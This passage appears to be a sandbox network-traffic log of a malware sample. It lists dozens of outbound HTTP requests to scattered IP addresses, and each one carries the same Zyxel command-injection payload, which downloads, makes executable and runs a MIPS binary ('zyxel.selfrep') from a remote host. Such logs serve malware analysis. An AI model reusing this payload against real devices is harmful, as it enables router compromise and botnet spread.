                                    Jan 13, 2024 19:02:20.857625008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1078192.168.2.1359564220.178.59.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857660055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1079192.168.2.1359262114.214.206.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857707977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1080192.168.2.1350320144.46.62.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857732058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1081192.168.2.133585639.61.168.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857750893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1082192.168.2.1357202179.162.195.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857781887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1083192.168.2.1350056173.94.15.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857815027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1084192.168.2.133977485.169.60.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857841969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1085192.168.2.1332870133.191.200.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857909918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1086192.168.2.1337620115.172.31.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857928038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1087192.168.2.1359854119.192.204.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857968092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1088192.168.2.134958231.203.235.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858026981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1089192.168.2.1333610120.12.164.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858066082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1090192.168.2.1332860217.92.25.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858119965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1091192.168.2.1335470141.88.51.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858161926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1092192.168.2.1350472177.240.219.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858186960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1093192.168.2.1333922115.145.95.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858215094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1094192.168.2.136014247.157.251.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858242989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1095192.168.2.134921844.95.242.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858284950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1096192.168.2.1343072131.142.201.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858319044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1097192.168.2.1351036148.128.204.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858350039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1098192.168.2.1339602101.178.81.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858367920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1099192.168.2.1341676177.66.59.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858417034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1100192.168.2.1337150101.17.96.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858448982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1101192.168.2.134804238.81.186.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858481884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1102192.168.2.134440661.175.38.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858510971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1103192.168.2.1351154208.183.72.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858544111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1104192.168.2.1352652112.222.204.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858589888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1105192.168.2.134605679.42.222.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858612061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1106192.168.2.1346920197.156.223.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858649969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1107192.168.2.1360248109.6.241.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858675957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1108192.168.2.1349632103.220.67.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858704090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1109192.168.2.1346634210.207.191.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858771086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1110192.168.2.1358834121.66.41.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858799934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1111192.168.2.1349540119.160.59.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858844042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1112192.168.2.1334152184.37.199.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858880997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1113192.168.2.1340134138.85.181.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858927011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1114192.168.2.1354670207.206.25.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.858969927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1115192.168.2.1350716193.158.150.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859035969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1116192.168.2.135895052.231.196.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859051943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1117192.168.2.1337264186.199.51.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859054089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1118192.168.2.135572839.176.91.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859096050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1119192.168.2.1354146118.99.198.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859126091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1120192.168.2.1360706152.131.27.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859153032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1121192.168.2.1336990186.2.30.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859174967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1122192.168.2.1337992123.210.128.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859206915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1123192.168.2.135665837.210.87.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859256029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1124192.168.2.1348078179.55.60.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859280109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1125192.168.2.1343658142.71.45.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859309912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1126192.168.2.1356530111.28.160.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859369993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1127192.168.2.135370296.95.105.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859385014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1128192.168.2.1341688109.65.151.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859420061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1129192.168.2.13469361.134.232.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859464884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1130192.168.2.133952486.193.89.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859491110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1131192.168.2.133859649.155.85.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859535933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1132192.168.2.1340526113.144.10.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859569073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1133192.168.2.134015613.53.204.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859622955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1134192.168.2.135383692.50.70.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859668970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1135192.168.2.1341500151.216.19.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859694958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1136192.168.2.1346092102.45.255.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859725952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1137192.168.2.1332874149.60.147.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859749079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1138192.168.2.1350310157.28.128.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859783888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1139192.168.2.133661241.159.176.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.859838963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1140192.168.2.1355976113.13.55.146443
                                    TimestampBytes transferredDirectionData
